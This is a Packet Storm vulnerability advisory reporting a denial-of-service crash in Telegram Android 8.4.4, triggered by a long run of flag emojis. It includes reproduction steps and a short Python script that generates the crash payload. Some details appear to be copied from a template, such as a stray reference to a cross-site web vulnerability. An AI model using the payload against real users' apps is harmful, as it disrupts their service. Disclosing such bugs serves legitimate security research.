what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Telegram Android 8.4.4 Denial Of Service

Telegram Android 8.4.4 Denial Of Service
Posted Feb 17, 2022
Authored by h4shur

Telegram Android version 8.4.4 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 083ec8c45a13fbe3a9590af6885488cf1b4b2dfec672ef5829c35237ac92906a

Telegram Android 8.4.4 Denial Of Service

Change Mirror Download
Document Title:
===============
Telegram Android v8.4.4 - Denial of Service (PoC)


References (Source):
====================
https://twitter.com/h4shur


Release Date:
=============
2022-01-30


Common Vulnerability Scoring System:
====================================
7.8


Product & Service Introduction:
===============================
Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)
service. The service also provides end-to-end encrypted video calling,
VoIP, file sharing and several other features. It was launched for iOS on
14 August 2013 and Android in October 2013. The servers of Telegram are
distributed worldwide to decrease frequent data load with five data centers
in different regions, while the operational center is based in Dubai in the
United Arab Emirates. Various client apps are available for desktop and
mobile platforms including official apps for Android, iOS, Windows, macOS
and Linux (although registration requires an iOS or Android device and a
working phone number). There are also two official Telegram web twin apps –
WebK and WebZ – and numerous unofficial clients that make use of Telegram's
protocol. All of Telegram's official components are open source, with the
exception of the server which is closed-sourced and proprietary.

Telegram provides end-to-end encrypted voice and video calls and optional
end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted
between the app and the server, so that ISPs and other third-parties on the
network can't access data, but the Telegram server can. Users can send text
and voice messages, make voice and video calls, and share an unlimited
number of images, documents (2 GB per file), user locations, animated
stickers, contacts, and audio files. In January 2021, Telegram surpassed
500 million monthly active users. It was the most downloaded app worldwide
in January 2021 with 1 billion downloads globally as of late August 2021.


Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered Android application
vulnerabilities in the Telegram application.


Affected Product(s):
====================
Vendor: telegram.org / telegram.me / t.me
Product: Android Telegram application (Android-Application)
https://telegram.org/android


Vulnerability Disclosure Timeline:
==================================
2022-01-30: Researcher Notification & Coordination (Security Researcher)
2022-01-30: Public Disclosure


Discovery Status:
=================
Published


Exploitation Technique:
=======================
local


Severity Level:
===============
medium


Disclosure Type:
================
Full Disclosure


Technical specifications and description:
================================
1.1
In version 8.4.4 of Android Telegram application, a denial of service
vulnerability was discovered by H4shur. Vulnerability is in the emojis of
these messenger.

1.2
If you send a number of flag emojis with any text on the chat page,
clicking on that message will stop the program altogether and avoid
providing services.


Proof of Concept (PoC):
=======================
1.1
A Denial of Service (DOS) attack is a type of cyberattack in which a
malicious person performs an attack with the aim of removing the resources
of a system from the reach of its users.
It is natural that if this attack is successful, the result will be a
slowdown or disabling of the equipment and resources available to the
victim.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.


PoC: Exploitation
1.1
Run the python script, it will create a new file "outputbufferh4shur.txt".
1.2
Run Telegram Android and go to "Saved Messages" or any Chat page.
1.3
Copy the content of the file "outputbufferh4shur.txt".
1.4
Paste the content of outputbufferh4shur.txt into the "Write a message..."
and then type any text to this message.
1.5
Ops...
Telegram Crashed <3


script:
bufferh4shur = "🇮🇷" * 114
try:
f=open("outputbufferh4shur.txt","w")
print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur))
f.write(bufferh4shur)
f.close()
print("[!] File Created!")
except:
print("File cannot be created!")



Security Risk:
==============
1.1
A Denial of Service (DOS) attack is a type of cyberattack in which a
malicious person performs an attack with the aim of removing the resources
of a system from the reach of its users.
It is natural that if this attack is successful, the result will be a
slowdown or disabling of the equipment and resources available to the
victim.


Credits & Authors:
==================
h4shur
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur
h4shursec@gmail.com
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close